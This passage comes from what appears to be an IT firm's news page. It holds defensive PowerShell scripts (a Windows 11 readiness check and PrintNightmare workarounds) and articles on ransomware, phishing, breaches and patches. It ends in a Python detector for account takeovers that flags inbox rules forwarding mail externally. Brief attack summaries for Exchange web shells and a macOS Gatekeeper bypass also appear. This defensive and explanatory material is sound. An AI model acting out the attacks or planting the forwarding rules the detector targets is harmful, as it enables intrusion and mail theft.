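    $bootDisk = Get-Disk | Where-Object { $_.IsBoot } | Select-Object -First 1
    $checks['Storage: boot disk >= 64 GB'] = ($null -ne $bootDisk) -and ($bootDisk.Size -ge 64GB)

    # Firmware: UEFI with Secure Boot support. Confirm-SecureBootUEFI throws
    # on legacy BIOS machines; on UEFI it returns whether Secure Boot is on.
    $checks['Firmware: UEFI'] = $env:firmware_type -eq 'UEFI'
    try {
        $secureBootOn = Confirm-SecureBootUEFI -ErrorAction Stop
        $checks['Secure Boot: supported'] = $true
        $checks['Secure Boot: enabled']   = [bool]$secureBootOn
    } catch {
        $checks['Secure Boot: supported'] = $false
        $checks['Secure Boot: enabled']   = $false
    }

    # TPM 2.0: SpecVersion reads e.g. "2.0, 0, 1.38" on a TPM 2.0 device
    $tpm = Get-CimInstance -Namespace root\cimv2\Security\MicrosoftTpm `
                           -ClassName Win32_Tpm -ErrorAction SilentlyContinue
    $checks['TPM: version 2.0'] = ($null -ne $tpm) -and ($tpm.SpecVersion -like '2.0*')

    # Display: at least 720p on the active adapter
    $gpu = Get-CimInstance -ClassName Win32_VideoController |
           Where-Object { $_.CurrentVerticalResolution } | Select-Object -First 1
    $checks['Display: >= 720p'] = ($null -ne $gpu) -and ($gpu.CurrentVerticalResolution -ge 720)

    foreach ($entry in $checks.GetEnumerator()) {
        [pscustomobject]@{ Check = $entry.Key; Pass = [bool]$entry.Value }
    }
}

$report = Test-Windows11Readiness
$report | Format-Table -AutoSize
if ($report.Pass -contains $false) {
    Write-Warning 'One or more checks failed; this PC needs changes (or replacement) before Windows 11.'
} else {
    Write-Host 'All automated checks passed.'
}
```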

 

Things to Expect

The following Windows 10 features are all due to disappear on the new version, in some cases being disabled, replaced by newer apps or available only via manual re-download from the Windows store on new installs:

– Internet Explorer
– Windows S Mode (Home Edition Only)
– Skype (Personal), 3D Viewer, Paint 3D and ‘OneNote for Windows 10’
– Start Menu Groups
– Taskbar Moving
– Tablet Mode
– Timeline

Cortana will also be relegated to the Start Menu – no longer used during setup and not automatically pinned to the taskbar.

 

Make a Backup / Create a Recovery Drive

Major (or even minor) Windows version upgrades are not without pitfalls as we’ve seen in recent years, so it’s worth checking that you have a full backup of your device prior to leaping into the unknown.

Synchronised copies of files in Microsoft OneDrive, Google Drive or Dropbox are always a plus, although for rapid restoration it’s also helpful to make a manual, local backup to a portable hard-drive that will be more quickly restorable if your subsequent upgrade doesn’t go to plan.

For the extra precaution of a route ‘back’ to Windows 10 if you discover a major compatibility issue, it’s important to make a recovery drive using a USB device.

 

Test the Beta

For power users, a beta version (Preview Build 22000.160) is available to test for those who register with the Microsoft Insider program.

 

For IT Support & Technical Expertise, please contact our team today.


Lineal Wins Big in International SysAdmin Challenge

Three Lineal IT engineers have scored among the ‘Top 50’ in the international CyberDrain ‘Capture-the-Flag’ SysAdmin Competition.

Hugo achieved a stunning 4th-place finish internationally – just narrowly missing out on a bronze medal for Team GB, but winning a PlayStation 5 in the process from competition cybersecurity-sponsor Huntress.

Martyn and Joe also scored very highly from among 1,000 competitors worldwide – finishing a record 17th and 32nd respectively.

Each passed significant milestones in their challenges – at 2000 points and 3000 points respectively – with Hugo becoming one of only four competitors worldwide to break the stratospheric 4000-point barrier.

Designed to test System Administration and IT engineering skills, the CyberDrain CTF challenge puts competitors through a series of forty investigative challenges across server and client-side, Microsoft Azure, Linux and Microsoft 365 environments. The competition ran throughout July, with bigger point bonuses awarded for more complex technical challenges.

Congratulations to all our competitors!

 

For IT Support and technical expertise – please contact us today.


Lineal Takes On Capture the Flag SysAdmin Challenge

An intrepid group of Lineal IT engineers are each competing in a capture the flag (CTF) event designed to sharpen the skills of Systems Administrators.

Points are awarded by completing a number of investigative technical challenges across Hyper-V, Microsoft Azure and 365 – capturing a ‘flag’, or important string of text, which credits the player’s score.

Designed to test System Administration and IT engineering skills, the ongoing July event is organised by CyberDrain and supported by judges from Managed IT Service Provider association CyberGeek, with one thousand contestants taking part.

There are forty flag-capture challenges being attempted by (overwhelmingly) IT engineers around the world – spanning server and client, Azure, Linux and Microsoft 365 management.

Challenges must be completed independently, and the scoreboard is updated as individuals compete for first place. Contestants are encouraged to tackle more difficult challenges to win prizes, and find creative alternative solutions to capturing flags – although hacking is strictly prohibited!

The capture the flag competition is sponsored by a number of leading IT, communications and cybersecurity providers, including Microsoft, Datto and Huntress.

Good luck to all those taking part!

 

For IT Support and technical expertise – please contact us today.


The Haunting of ‘PrintNightmare’ – Windows patches released

Microsoft have delivered emergency out-of-band patches for the ‘PrintNightmare’ zero-day Print Spooler vulnerability, with more on the horizon.

The bug, CVE-2021-34527, exists in all versions of Windows: a remote code execution vulnerability in which the Windows Print Spooler service improperly performs privileged file operations.

This vulnerability means that a cyber attacker could run arbitrary code, allowing them to install programs; view, change or delete data; and even go so far as to create new accounts with full user rights on the system.

A cautionary Microsoft statement released outlined the situation with “the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as ‘PrintNightmare’, documented in CVE-2021-34527.”

Patches released are available for Windows Server 2019, Windows Server 2012 R2, Windows Server 2008, Windows 8.1, Windows RT 8.1, a variety of supported versions of Windows 10 and the no longer supported Windows 7.

However, Microsoft announced that security updates are not currently available for Windows 10 version 1607, Windows Server 2012 or Windows Server 2016, and urges prompt installation of its patches – when made available in due course – to deter any attacks via the domain controller. Microsoft also offers workarounds for those unable to download the July patches, including stopping and disabling the Print Spooler service, and disabling inbound remote printing through Group Policy.
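As an added example (not from the original post, and not a Microsoft tool), the following PowerShell reports whether a host still accepts remote Print Spooler connections and can apply the two workarounds described above; it assumes the Group Policy setting ‘Allow Print Spooler to accept client connections’ is backed by the RegisterSpoolerRemoteRpcEndPoint registry value shown (2 = disabled), as in Microsoft’s workaround guidance.

```powershell
# Added example: check and apply the PrintNightmare workarounds. Run elevated.
# Disabling the Spooler removes all printing on that host, so on print
# servers prefer the policy-only workaround and patch as soon as possible.

$PolicyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
$PolicyName = 'RegisterSpoolerRemoteRpcEndPoint'   # assumed mapping of the GPO setting

function Get-PrintSpoolerExposure {
    $svc    = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $policy = Get-ItemProperty -Path $PolicyPath -Name $PolicyName -ErrorAction SilentlyContinue

    $running       = ($null -ne $svc) -and ($svc.Status -eq 'Running')
    $remoteBlocked = ($null -ne $policy) -and ($policy.$PolicyName -eq 2)

    [pscustomobject]@{
        ComputerName          = $env:COMPUTERNAME
        SpoolerStatus         = if ($svc) { [string]$svc.Status }    else { 'NotInstalled' }
        SpoolerStartType      = if ($svc) { [string]$svc.StartType } else { 'NotInstalled' }
        RemotePrintingBlocked = $remoteBlocked
        # Remote exploitation needs a running spooler that still accepts client connections
        RemotelyExposed       = $running -and -not $remoteBlocked
    }
}

# Workaround 1: stop the service and prevent it from starting again
function Disable-PrintSpooler {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess('Spooler', 'Stop and disable service')) {
        Stop-Service -Name Spooler -Force
        Set-Service  -Name Spooler -StartupType Disabled
    }
}

# Workaround 2: keep local printing but refuse inbound remote connections
function Block-InboundRemotePrinting {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess($PolicyPath, "Set $PolicyName = 2")) {
        if (-not (Test-Path $PolicyPath)) { New-Item -Path $PolicyPath -Force | Out-Null }
        Set-ItemProperty -Path $PolicyPath -Name $PolicyName -Value 2 -Type DWord
        Restart-Service -Name Spooler -ErrorAction SilentlyContinue   # policy is read at start-up
    }
}

$before = Get-PrintSpoolerExposure
$before | Format-List
if ($before.RemotelyExposed) {
    # Preview the change first; drop -WhatIf to apply it
    Block-InboundRemotePrinting -WhatIf
}
```

Re-run Get-PrintSpoolerExposure after applying either workaround (or the July patch) to confirm RemotelyExposed reports False.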

The proof of concept (PoC) was accidentally released on GitHub by Chinese technology group Sangfor, but was cloned and cached before the researchers realised their mistake and took down the PoC. The group were under the impression that the exploit had already been patched as part of Microsoft’s CVE-2021-1675 patch – a patch Microsoft confirmed addressed a different attack vector and vulnerability, associated with RpcAddPrinterEx.

The situation is continually updating and the latest news on Windows patch releases can be found here.


Kaseya Clients Struck by Ransomware

More than a thousand organisations using Kaseya Remote Monitoring and Management (RMM) software are estimated to have been hit by ransomware over the weekend.

The supply chain attack, which was described as “colossal and devastating” by security research company Huntress, is believed to have been carried out by the same Russia-linked ‘REvil’ ransomware gang strongly-suspected of the recent ransomware attack on meat-packing corporation JBS.

Miami-based Kaseya’s ‘VSA’ product – which is used by Managed Service Providers to provide remote IT services to the systems of organisations worldwide, including endpoint and patch management – is believed to have been breached with an update that rolled-out ransomware to many of Kaseya’s own customers.

REvil themselves claim the total number of encrypted user endpoints around the world may be as high as one million, and have demanded an unprecedented ransom of $70m in Bitcoin (around £51m at current price.)

On Friday, Kaseya advised all customers to immediately shut down any on-premises Kaseya VSA servers, to prevent hackers shutting off administrative access for future fixes – and ignore any communication from hacking groups while an FBI investigation was ongoing. 

Access to Kaseya’s cloud-based SaaS services was initially shut down as a precaution, but has since been restored, and an endpoint detection tool has been published online here.

It is now believed that the exploit for Kaseya VSA had recently been highlighted by the Dutch Institute for Vulnerability Disclosure, but early patches to rectify the problem had not yet been issued. In the 48 hours following the breach, more than 2,000 VSA servers were taken offline – suggesting that many organisations did heed warnings issued by the US Cybersecurity and Infrastructure Security Agency (CISA), the UK National Cyber Security Centre (NCSC) and others – although Swedish supermarkets, New Zealand schools and many others have had systems crashed by encrypted data.

Kaseya is publishing regular updates to its advisory page, here.

For Cybersecurity expertise and support, please contact our team today.


Updated: Phishing Email Examples

It’s 2021 but somehow the phishing email scams just keep coming.

You could almost miss the days when ‘Bill Gates’ would get in touch by email to offer you a shipment of diamonds. Modern email scams are much more sophisticated, the designs more convincing, and the payloads more dangerous – than ever.

Our advice remains the same:

  • Be wary of any unsolicited email or unknown contact.
  • Always look to see if an email is being sent from the correct domain.
  • Don’t open any unexpected or mystery attachment, or click links to unrecognised destinations.
  • If unsure, verify information with someone by asking via a communication method other than email (eg: by looking up a phone number separately from the email, and calling direct.)

Here’s our pick for some of the sneakiest our team have seen ‘in the wild’:

 

The Dodgy File Share (Deluxe Edition)

As useful as a crowbar in the arsenal of the burglar, cybercriminals have been using these ever since file sharing and collaboration apps took over the world – this one appeared even more persuasive for its nearly spot-on branding imitating a Microsoft 365 file share link.

But the Deluxe edition takes this scam to a whole new level – with just a mistaken click giving cybercriminals automated access to the account, and even replying affirmatively to emails between users asking if these are genuine. Nasty.

 

The TV License

TV licensing is something many people buy once a year, often never receiving physical proof, and don’t think about much – making this a clever way to steal card details without arousing too much suspicion.

These often go the extra mile – making up fake customer numbers and renewal dates – to seem real, which can also identify the email as a scam if cross-referenced in your own records.

 

The Pandemic Phish

Cybercriminals don’t let little things like ethics get in the way of a good scam – with widespread public fear, and the NHS Covid vaccine roll-out in full swing, everything is an opportunity to hack accounts, steal information, or extort money.

Please be aware the real NHS will contact you via a combination of text message and/or post, and certainly won’t threaten you with the loss of your vaccine appointment if you don’t click a suspicious link.


 

Divine Intervention

OK, perhaps not a threat to everyone – but it’s easy to imagine this inheritance scam prompting a click from someone more spiritually-minded. Technology aside, a compelling story is sometimes the most persuasive scam of all.


For Cybersecurity expertise and support, please contact our team today.


Fastly internet outages affecting Europe and North America

A number of retail, news and social media websites experienced internet downtime caused by an outage at the global website cloud hosting service, Fastly.

For an hour from 11am BST today, users of Fastly’s hosting service, including gov.uk, PayPal, Amazon and a whole host of other major company websites, were greeted with an “Error 503 Service Unavailable” message detailing problems with the cache server.

By 12.09pm BST, Fastly released a statement saying that their global network was coming back online and that it had been “investigating potential impact to performance with our CDN [content delivery network] services”. However, users were still met with slow loading times and sporadic access to multiple companies’ websites.

Error 503 message that greeted those trying to access the affected websites

When functioning correctly, CDNs such as Fastly aim to improve website security from denial-of-service attacks and reduce loading time for images, videos and HTML pages whilst managing sudden web traffic clusters for their customers’ websites.

ESET commented on the outage and its implication going forward with “whether it be malicious or otherwise, this highlights the importance and significance of these vast hosting companies and what they represent” – adding weight to the growing responsibility that these CDN providers have over global Internet control and access.

The outage raises security concerns over the over-centralisation of the internet in the hands of a few major hosting providers, and asks questions about its reliability in the future should a larger-scale problem like this occur again – demonstrating that we have not learned our lesson from past hosting service outages such as the Cloudflare crash of 2019.

Full list of all websites affected below:

AFR, Age, Amazon, Boots, BuzzFeed, CNN, Deliveroo, Etsy, Evening Standard, Financial Times, Giphy, Horse and Hound, IGN, Imgur, Independent, Kickstarter, Le Monde, New York Times, PayPal, Pinterest, Reddit, Royal Mail, SMH, Spotify, Taboola, The Guardian, The Verge, Twitch, Twitter, UK Government website (including HM Revenue and Customs), Vimeo and Weightwatchers

 


7.5 Million at risk from out-of-date ISP routers

Consumer watchdog Which? have investigated 13 legacy router models supplied by leading UK internet service providers (ISPs) including EE, Sky, TalkTalk, Virgin Media and Vodafone – and the report found that around 7.5 million internet users are at risk from out-of-date hardware.

Out of the 13 router models investigated, 9 presented pressing security flaws that are unlikely to be in compliance with upcoming UK government legislation around tackling the security of connected devices.

The new legislation is in response to government figures showing that 49% of UK residents have purchased at least one smart device since the start of the COVID-19 pandemic. Because of this huge increase in the national scope of vulnerability to potential cyber-attacks, the proposed legislation will ban easy-to-guess default passwords across all such devices, and enforce policies to make it easier to report software bugs that can be exploited by hackers on legacy or modern hardware.

Kate Bevan, Which?’s Computing Editor, commented that “proposed new government laws to tackle devices with poor security can’t come soon enough – and must be backed by strong enforcement.” Which? are simultaneously pushing for increased transparency from ISPs about how customers automatically or manually update their routers and how they should actively upgrade existing customers who are identified as being in the ‘at risk’ category.

Of those 7.5 million affected, 6 million users currently possess ISP hardware that has not been updated since 2018 and a few instances even as far back as 2016 – meaning that these vulnerable devices have not received security updates for defence against the latest threats posed by cybercrime.

A cluster of three main problems with ISP legacy hardware were identified by Which? ranging from weak default passwords that allow cybercriminals unlimited access to a router from anywhere, a lack of firmware updates and a local network vulnerability issue with EE Brightbox 2 giving potential hackers full control of the router to install malware or malicious spyware.

In response, Virgin Media have openly rejected Which?’s report conclusions; saying that 9 out of 10 customers are using their latest router models and are benefiting from regular router security updates. This sentiment was mirrored by BT Group (owners of EE), TalkTalk and Vodafone who announced that the HHG2500 device included in the Which? report has not been supplied since August 2019.

Devices with weak default passwords: TalkTalk HG635, TalkTalk HG523a, TalkTalk HG533, Virgin Media Super Hub 2, Vodafone HHG2500, Sky SR101 and Sky SR102.

Routers affected by lack of updates: Virgin Media Super Hub, Virgin Media Super Hub 2, Sky SR101, Sky SR102, TalkTalk HG523a, TalkTalk HG533 and TalkTalk HG635.

Routers that passed the Which? security tests: BT Home Hub 3B, BT Home Hub 4A, BT Home Hub 5B and Plusnet Hub Zero 2704N


macOS Gatekeeper Vulnerability Discovered

Apple has released important security updates under macOS 11.3, in response to a serious gatekeeper vulnerability discovered by security researcher Cedric Owens.

The weakness, found in Apple’s ‘Gatekeeper’ tool which normally blocks unrecognised apps from being installed by default, allows a dangerous file to be rigged so as to not trigger the operating system’s inbuilt safeguards.

Writing in a Medium Post entitled ‘Gatekeeper Bypass: 2021 Edition’, Owens demonstrates a terrifying method by which an attacker can ‘very easily craft a macOS payload that is not checked by Gatekeeper.’

Once launched, no warning prompts prevent the user from installing just about any dangerous application, which can also communicate with external servers without even triggering App Transport Security (ATS).

The simplicity of the hack, which leverages the fact that scripts placed in the Contents/MacOS/ directory are not checked, has been described by Objective-See as ‘massively bad’ and ‘a doozy’ of a blog post.

GateKeeper itself was originally introduced in 2012 as part of an effort to stop the spread of malware in Mac OS X ‘Lion’ v10.7.5, and was followed by enforced application notarisation in 2020 under macOS 10.15 ‘Catalina’, as Apple required software developers to have apps officially cleared for authorised use.

In response to the discovery, Apple have released macOS Big Sur 11.3 update with ‘improved state management’ that prevents the ‘bypass’ of Gatekeeper checks, and are urging macOS users to install the upgrade.

 

For Cybersecurity expertise and support, please contact our team today.


NHS COVID-19 update blocked for breaching privacy rules

The NHS COVID-19 app, run by the Department for Health and Social Care (DHSC), has had its latest update blocked due to a breach in the privacy terms outlined by Apple and Google.

The NHS Coronavirus app, available on Apple and Android devices, was designed to include a new feature that would allow users (upon showing a positive COVID test result) to upload a list of all locations and establishments they had visited, recorded by scanning a QR code with their phone.

The Exposure Notification System built into the app’s software would then alert other users who had entered the same venue to monitor their symptoms or to be tested immediately. This update relies on location tracking for its function – a form of tracking heavily reliant on Bluetooth monitoring of surrounding devices with the app installed – which is outlawed by the Apple and Google privacy agreements.

This is the latest in a calamitous string of COVID app mishaps by the UK Government who had only recently scrapped plans for their own rival system to the Apple and Android contact tracing system.

Total development of the UK based rival tracking app cost £12 million over a 3 month period, but was eventually rejected due to battery life issues, privacy concerns over Bluetooth’s potentially invasive interaction with, and data collection from, other apps installed on the device such as Facebook and Twitter. As a consequence, the Apple and Android app was adopted even with the concerns over restrictions of location data.

As the UK returns to a quasi-normal state with Phase 2 of lockdown lifting measures being rolled out today, this news comes as a blow for the Department of Health, who have released a statement reassuring the public that the update blockage does not affect the overall functionality of the NHS COVID-19 app and that there are “discussions ongoing with our partners to provide beneficial updates to the app which protect the public”.

Instead of the updated version, the previous form of the app will still be obtainable in both the Google Play and iOS App Stores.


Facebook & LinkedIn breaches hit 500 million users

Facebook and LinkedIn have both suffered massive data breaches, exposing the details of more than 533 million and 500 million user accounts respectively, it has been revealed.

Extensive leaked data from Facebook was reportedly found online by security researcher Alon Gal – including the personal information of 11 million UK users such as phone numbers, locations, birth dates and many email addresses.

It’s believed that the ‘hack’ may relate to a bug in Facebook’s friend-adding ‘Contact Importer’ tool which was fixed in September 2019. Previous breaches in 2017 fell before the introduction of GDPR, which Facebook argues absolved it of responsibility to notify users.

Questions still hover over the LinkedIn breach in particular, with the company claiming much of their data appears to have been aggregated from other sources, or (like Facebook) were perhaps not technically ‘hacked’ at all – but scraped in bulk from publicly visible parts of the popular professional website.

The huge cache of LinkedIn data was thought to be on sale, after security researchers found a 2 million user ‘sample’ advertised online.

A Facebook spokesperson told Reuters the social media platform will not inform users if their accounts were part of the breach, and LinkedIn are yet to issue a statement on this point – although given that LinkedIn has around 740 million accounts in total, a clear majority of its users are likely affected.

Users of both platforms can check if their email addresses (and now phone numbers) were likely breached via either platform over at: https://haveibeenpwned.com/ – and are advised to update passwords as a precaution.

 

For IT Support and cybersecurity expertise, please contact our team today.


Urgent Patches issued for Microsoft Exchange Server

Microsoft have urged the system admins of on-premise Exchange email servers to upgrade in response to new breaches from state-sponsored hackers.

The Chinese group, known as ‘HAFNIUM’, are believed to have exploited previously undiscovered zero-day vulnerabilities in Microsoft Exchange Server 2013, 2016 and 2019 via compromised US-based servers. Microsoft Exchange Online or related services (such as Microsoft 365) are not affected.

All four vulnerabilities were announced on Wednesday by the Microsoft Security Response Centre (MSRC) and graded ‘Critical’ – requiring urgent patching.

CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 together create a ‘perfect storm’: the attacker makes an untrusted connection to the targeted Exchange Server on port 443, authenticates as if they were someone with authorised access, and adds a web shell that grants a backdoor for future access.

HAFNIUM has previously been accused of industrial espionage and attempts to breach the technology of important private, public and national security organisations, including defence contractors.

As of 4th March, the Department of Homeland Security has also issued an emergency directive to all US federal agencies to urgently patch any on-premises Exchange servers by midday on 5th March.


For Cybersecurity advice and expertise, please contact our team today.


Cyber Aware Launches new Action Plan Tool for Small Businesses

The UK National Cyber Security Centre have launched a new online Cyber Aware ‘Cyber Security Self-Assessment Tool’ to help small businesses.

Free to use, and aimed at organisations with fewer than ten staff, the short online questionnaire generates a handy to-do list of actionable cybersecurity recommendations and points to check, with guidance for each – depending on the answers submitted.

The questions branch depending on the circumstances of each small business, but cover topics including backups, passwords, technology lifecycle management and more. Small business owners are also directed to useful plain-English resources to address each point highlighted.

Cyber Aware is a campaign launched by the UK National Cyber Security Centre (the public-facing arm of GCHQ) designed to provide simple guidance for individuals and small businesses to use technology more safely.

You can learn more about Cyber Aware, the NCSC, and get your own Action Plan here.


For IT Support and cybersecurity expertise: please contact our team today.


Final Month for Edge Legacy Browser

Support for Microsoft Edge Legacy will officially end on 9th March 2021, and the web browser will not receive any further security updates, Microsoft have announced.

The next Windows 10 monthly update, due 13th April, will automatically include the new (Chromium-based) Microsoft Edge and replace the legacy version automatically.

Edge was originally released in 2015 as a direct replacement and refresh for Internet Explorer, which was rapidly losing market share among the world’s most popular web browsers. Edge Legacy, which used EdgeHTML, was a programming fork of Microsoft’s ‘Trident’ engine that had been used in Internet Explorer 11.

The new Edge, released in 2020 and based on the same Chromium ‘Blink’ browser engine as Google Chrome, has proved more popular – and as of January 2021 looks set to overtake Firefox as the world’s third biggest web browser.

Enterprise organisations still provisioning the legacy version as standard are advised to plan their deployment of the new Microsoft Edge with the following set of steps.


Lineal is a Microsoft Gold Partner – for IT expertise and support, please contact us today.


81,000 .eu Domains Frozen

Approximately 50,000 UK customers have had .eu domains suspended, following Brexit.

The .eu domain registrar EURid has formally suspended 81,000 such domains as of 1st January 2021, following the decision that .eu ownership requires the owner to be resident in a country that holds membership of the European Union.

Many internationally trading UK companies hold foreign domain versions of their websites to assist trading overseas, support multiple languages, improve web performance in other territories and develop export markets.

Numerous IT services, including email, websites, directories and more are often also tied to domains which represent a key pillar of many companies’ authentication technology.

Many British domain holders cancelled their domains as the transition period approached – over 200,000 .eu domains held by UK customers were cancelled between 2018 and 2021, with registrars contacting customers multiple times to alert them to the changes.

Although the remaining 81,000 have not been cancelled outright, UK customers have no way to recover these domains without proving that the owner holds citizenship of an EU member state and providing a suitable registered address.

Britain’s exit from the EU also begins a countdown for these customers – who must either have an EU company representative renew on their behalf, or face their domains being put back up for sale by 2022.


Need IT Support expertise? Contact Lineal today.


Microsoft cautions against SMS 2FA

Microsoft have announced they will direct users away from SMS 2FA (‘text-based’ two-factor authentication) for security reasons.

Instead, the company will promote multi-factor authentication methods they consider to be more secure – including biometrics and secure authentication apps such as Microsoft Authenticator – for logging into Microsoft services such as Microsoft 365 and Azure.

SMS-based two-factor authentication, where the user typically receives a passcode text message to their smartphone that acts as a secondary confirmation of who they are, has been a staple of online banking and many other secure online services needing two-factor authentication (2FA) for over a decade.

However, many now believe that SMS messages can be intercepted, and would rather move users onto authenticator apps or issue secure keys that generate passcodes on the device itself.

Official Microsoft statistics state that enabling Multi-Factor Authentication (MFA) to verify identity blocks 99.9% of all automated account breaches. Users of SMS-based two-factor authentication should not ‘stop’ using it (despite the flaws of SMS, any 2FA is better than none), but should consider swapping to other methods.

We’ve talked before about the often-predicted ‘death of passwords’ – and possible scenarios for their phasing out – but in recent years a number of big tech firms, including Apple, Google and Microsoft, have all outlined long-term plans to replace passwords with biometric or other forms of login.

This change to Microsoft’s advice will, however, push MFA specifically towards biometric, authenticator-app or secure-key methods, rather than relying on mobile networks to deliver one-time passcodes.


For cybersecurity expertise and support, please contact our IT team today.


Apple M1 Silicon Chips in New Macs

Apple have announced a new range of Mac devices with Apple M1 Silicon Chips. iPad and iPhone devices have used Apple’s own ‘A’ chips for some time, but M1 will be the first Apple chipset in macOS devices – which previously used Intel chips under license.

M1 is expected to show exceptional performance – with the 8-core CPU matching comparable PC laptop performance while using only 25% of the power, and able to deliver over twice the speed of comparable PC laptop CPU performance at maximum power levels.


Apple claim this makes the newest generation of devices – the new MacBook Air, MacBook Pro and Mac mini – faster than 90% of PCs sold in the last year.

Autumn 2020 sees the release of macOS Big Sur, the latest update to Apple’s Mac operating system, which has been optimised for the M1 chipset and its integrated graphics – as well as offering new app features such as universal Mac apps that run across all M1 devices, and iOS/iPadOS apps running on macOS.


For Apple expertise and support, please contact our team today.



Petroc Techknowledgey Transfer Launches

Lineal are delighted to be taking part in the new Petroc Techknowledgey Transfer project – aimed at teaching students to support businesses with special technology masterclasses.

The project will involve some of North Devon’s best known technology firms, and cover a range of different topics, including modern accounting, digital marketing, procurement, cybersecurity and other important business processes.

“Petroc’s Techknowledgey Transfer project is excited to be supporting local businesses alongside local business experts Applegate Marketplace, Maynard Johns Chartered Accountants, Lineal, LimeCloud and Barr Media to deliver an exciting new project.

We are inviting small and medium sized businesses to access support on business admin technologies. Our business partners will be delivering fully funded virtual masterclasses to eligible businesses. We also have student work placements available for some businesses. For more information, please contact- [email protected]

One hundred small businesses will be selected to take part in the student-led part of the Petroc Techknowledgey Transfer, which will also be a studied project to measure the benefits of technical expertise being applied to businesses.

More information is available on Petroc’s website here.


For IT expertise and support, please contact our team today.


Lineal Becomes Keeper Partner

Lineal Software Solutions has become a managed service provider for Keeper Password Management.

We tested a number of different Password Management providers, including 1Password and LastPass, but were particularly impressed with Keeper.

Password management is increasingly recognised as a key pillar of cybersecurity: the UK National Cyber Security Centre admits it is ‘virtually impossible’ for users to use unique passwords for all their accounts without software assistance.

Password managers help users remember all their passwords – but can be a much more powerful tool for dramatically limiting the damage in the event of a single account being compromised.

Criminals increasingly use credential-stuffing attacks where automated tools use previously-breached account details to gain access to the user’s other accounts.

A good password manager ensures you can use a strong, randomly generated and distinct password across each of your accounts to prevent any single breach putting other data at risk.

Keeper can also notify users when breached passwords are identified online, integrate with single sign on tools such as Active Directory, and enforce multi-factor authentication – all important considerations for organisations needing to maintain cybersecurity standards across large teams.

For added convenience, Keeper is available via the web, Windows/MacOS desktop clients, browser extension and Android/iOS mobile app.


For Cybersecurity advice and expertise, please contact our team today.



Windows XP Source Code Leaks Online

The original source code to Microsoft Windows XP and Windows Server 2003 has leaked online – nearly two decades after their original release.

Official support for Windows XP ended back in 2014, and the final security patch was a one-off release in 2017 released in response to the WannaCry ransomware attack that temporarily crippled large parts of the NHS.

Among the interesting things we learned were that Microsoft originally included a hidden theme that made Windows XP look like Apple’s rival macOS operating system, and that the 4chan poster who released the dump had either added or helped spread anti-vax and population control conspiracy-theory material about Microsoft founder Bill Gates.

According to NetMarketShare, Windows XP still accounts for at least 1% of all PCs that generate web traffic worldwide (around 25 million PCs), although in practice this may include many air-gapped factory PCs and similar.

The 43GB data dump has been available to Government agencies and similar bodies for a while; what is unusual is that the public at large now has the opportunity to hunt for zero-day exploits across an entire operating system. Microsoft urges that users should not still be using XP: the outdated platform is insecure even for the oldest legacy services.


For IT expertise and guidance, contact our IT team today.


AI saves the day

AI lent a helping hand to one of our technical support teams last week to help Lineal save a local business from an email hack.

At 07:40 GMT on a seemingly normal week day, Barracuda Sentinel issued an alert to Lineal to say an account had been accessed from a suspicious location. It seemed a malicious actor, appearing to be from Nigeria, had compromised one of a client’s finance department email accounts, and created a forwarding/delete rule in the inbox.

Barracuda Sentinel’s AI email protection caught the account takeover attempt, and as a result, we were able to mitigate and resolve a significant threat to one of our customers. Barracuda Sentinel detects both account takeover attempts and attacks launched from compromised accounts.

Corporate account takeover presents a significant new threat to business. Hackers gain access to email accounts and use them as tools to launch subsequent targeted attacks, internally and against external targets – who themselves fall victim.

Account takeover or attacks that originate from these accounts are almost impossible to detect as they don’t use the usual impersonation techniques—they come from a legitimate account and appear to be from a trusted source, allowing the attacker to initiate sophisticated financial scams.

Lineal automatically picked up the alert and created an incident in Barracuda Sentinel. Sentinel remediated the issue with an immediate password reset, disconnecting all active logon sessions for the user and deleting any rules created during the incident window. Within 40 minutes this potentially disastrous event was averted.

Barracuda’s worldwide threat protection network automatically gathers intelligence from inboxes around the world to deliver award-winning security, checking both inbound and outbound email to stop the spread of cyber-threats and malicious communications.  To find out more visit our Barracuda Email Security page on our website.

This risk could have easily been mitigated by using any of Lineal’s services, such as:

  1. Using Multi-Factor Authentication (MFA) on the account,
  2. Barracuda Sentinel-type tools to alert/remediate on compromise,
  3. Having Azure P1/P2 licensing to allow the use of conditional access to prevent sign-ins from risky locations, untrusted countries, etc.
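The two signals in the story above, a sign-in from an unexpected country followed by an inbox rule that forwards mail externally and deletes the original, are exactly what a detection should correlate. The following is an added example of that correlation logic, written for this page and not Barracuda Sentinel’s or Lineal’s own code. The sign-in events, inbox rules, domain names and IP addresses are constructed sample data, and the remediation steps it recommends (password reset, session revocation, rule deletion) are the ones the text describes; the function names are this example’s own.

```python
from datetime import datetime

# Constructed sample data standing in for a mailbox-security feed. The domain,
# users, addresses and IPs are documentation placeholders, not real infrastructure.
INTERNAL_DOMAIN = "example.co.uk"
EXPECTED_COUNTRIES = {"GB"}

SIGNINS = [
    {"user": "finance@example.co.uk", "time": "2020-09-14T06:05:00Z",
     "country": "GB", "ip": "203.0.113.10"},
    {"user": "finance@example.co.uk", "time": "2020-09-14T07:31:00Z",
     "country": "NG", "ip": "198.51.100.7"},
]

INBOX_RULES = [
    {"user": "finance@example.co.uk", "name": "Invoices",
     "created": "2020-09-14T07:35:00Z",
     "actions": {"forward_to": ["review@mail.example.net"], "delete": True}},
    {"user": "finance@example.co.uk", "name": "Newsletters",
     "created": "2020-08-01T09:00:00Z",
     "actions": {"move_to": "Newsletters"}},
]


def _ts(value: str) -> datetime:
    """Parse an ISO-8601 UTC timestamp ending in 'Z'."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def suspicious_signins(signins, expected_countries=EXPECTED_COUNTRIES):
    """Sign-ins from outside the countries the organisation expects to see."""
    return [s for s in signins if s["country"] not in expected_countries]


def suspicious_rules(rules, internal_domain=INTERNAL_DOMAIN):
    """Inbox rules that forward mail outside the organisation or delete it:
    the two hallmarks of a rule planted after an account takeover."""
    findings = []
    for rule in rules:
        actions = rule["actions"]
        external = [a for a in actions.get("forward_to", [])
                    if not a.lower().endswith("@" + internal_domain)]
        reasons = []
        if external:
            reasons.append("forwards to external address(es): " + ", ".join(external))
        if actions.get("delete"):
            reasons.append("deletes the original message")
        if reasons:
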